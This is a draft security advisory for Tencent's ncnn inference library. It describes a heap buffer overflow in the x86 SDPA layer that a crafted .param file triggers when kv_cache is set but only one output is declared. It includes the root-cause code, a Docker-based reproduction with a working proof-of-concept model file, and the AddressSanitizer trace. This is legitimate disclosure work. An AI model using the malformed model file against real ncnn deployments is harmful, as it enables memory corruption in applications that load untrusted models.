All advisories
Draft

Heap Buffer Overflow in SDPA KV-Cache Outputs

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Heap Buffer Overflow in SDPA KV-Cache Outputs

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/sdpa_x86.cpp:342 in SDPA_x86::forward
Sanitizer verdict: heap-buffer-overflow

Summary

A .param model that declares an SDPA layer with 7=1 (kv_cache) but only one output blob makes the x86 SDPA implementation assign two ncnn::Mat objects past the end of the top_blobs vector, which ncnn sized from the layer's declared output count. The first out-of-range assignment invokes Mat::operator=, whose release() dereferences a refcount pointer read from heap memory 8 bytes beyond the allocation — an uncontrolled decrement and potential free() of whatever that adjacent memory holds. The entry point is ncnnoptimize, which loads the attacker's parameter file and runs ModelWriter::shape_inference(); any Net::forward over the same model reaches it identically.

Detail

SDPA::load_param takes kv_cache = pd.get(7, 0); from the parameter file and never cross-checks it against the layer's declared blob counts. The runtime sizes the output vector purely from the graph text:

// src/net.cpp:855
                std::vector<Mat> top_blobs(layer->tops.size());
                int ret = layer->forward(bottom_blobs, top_blobs, opt);

// src/layer/x86/sdpa_x86.cpp:340
    if (kv_cache)
    {
        top_blobs[1] = key;
        top_blobs[2] = value;
    }

The forward implementation only ever writes top_blobs[0] explicitly (Mat& top_blob = top_blobs[0];), then unconditionally appends the two cache tensors when kv_cache is set. Nothing in load_param, in Net::load_param, or at the top of forward requires tops.size() == 3 in that configuration, so a model that declares SDPA sdpa 5 1 ... 7=1 — five inputs, one output — is accepted.

With one declared top the vector holds a single 88-byte ncnn::Mat. top_blobs[1] addresses byte 88, one element past the end. Mat::operator= at src/mat.h:1551 calls release() on the destination before overwriting it, and release() starts with if (refcount && NCNN_XADD(refcount, -1) == 1), loading the 8-byte refcount field at offset 8 of that out-of-range element — address 96, the "8 bytes after 88-byte region" in the ASan report. In an unsanitized process this reads whatever heap data follows the vector as a pointer and, if it is non-null, atomically decrements through it and may call fastFree() on the adjacent data field; top_blobs[2] = value then repeats the pattern 88 bytes further out.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-overflow-in-sdpa-kv-cache-outputs && cd ncnn-poc-heap-buffer-overflow-in-sdpa-kv-cache-outputs

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'EOF'
7767517
6 6
Input query 0 1 query 0=1
Input cur_key 0 1 cur_key 0=1
Input cur_value 0 1 cur_value 0=1
Input past_key 0 1 past_key 0=1
Input past_value 0 1 past_value 0=1
SDPA sdpa 5 1 query cur_key cur_value past_key past_value output 7=1
EOF

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x508000000480 at pc 0x64528380bf3b bp 0x7ffcf9814bd0 sp 0x7ffcf9814bc0
READ of size 8 at 0x508000000480 thread T0
    #0 0x64528380bf3a in ncnn::Mat::release() /ncnn/src/mat.h:1583
    #1 0x64528380bf3a in ncnn::Mat::operator=(ncnn::Mat const&) /ncnn/src/mat.h:1551
    #2 0x64528380bf3a in ncnn::SDPA_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/sdpa_x86_avx512.cpp:342
    #3 0x64527a93370b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
    #4 0x64527a91bb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #5 0x64527a97b9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #6 0x64527a80d3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #7 0x64527a88aeee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #8 0x747df95411c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x747df954128a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #10 0x64527a80a624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x508000000480 is located 8 bytes after 88-byte region [0x508000000420,0x508000000478)
allocated by thread T0 here:
    #0 0x747df9bbc548 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:95
    #1 0x64527a89ba99 in std::__new_allocator<ncnn::Mat>::allocate(unsigned long, void const*) /usr/include/c++/13/bits/new_allocator.h:151
    #2 0x64527a897522 in std::allocator_traits<std::allocator<ncnn::Mat> >::allocate(std::allocator<ncnn::Mat>&, unsigned long) /usr/include/c++/13/bits/alloc_traits.h:482
    #3 0x64527a897522 in std::_Vector_base<ncnn::Mat, std::allocator<ncnn::Mat> >::_M_allocate(unsigned long) /usr/include/c++/13/bits/stl_vector.h:381
    #4 0x64527a9891be in std::_Vector_base<ncnn::Mat, std::allocator<ncnn::Mat> >::_M_create_storage(unsigned long) /usr/include/c++/13/bits/stl_vector.h:398
    #5 0x64527a985bd4 in std::_Vector_base<ncnn::Mat, std::allocator<ncnn::Mat> >::_Vector_base(unsigned long, std::allocator<ncnn::Mat> const&) /usr/include/c++/13/bits/stl_vector.h:335
    #6 0x64527a9841a0 in std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >::vector(unsigned long, std::allocator<ncnn::Mat> const&) /usr/include/c++/13/bits/stl_vector.h:557
    #7 0x64527a933670 in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:855
    #8 0x64527a91bb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #9 0x64527a97b9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #10 0x64527a80d3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #11 0x64527a88aeee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #12 0x747df95411c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #13 0x747df954128a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #14 0x64527a80a624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/src/mat.h:1583 in ncnn::Mat::release()

Credit

Zheng Yu @ DepthFirst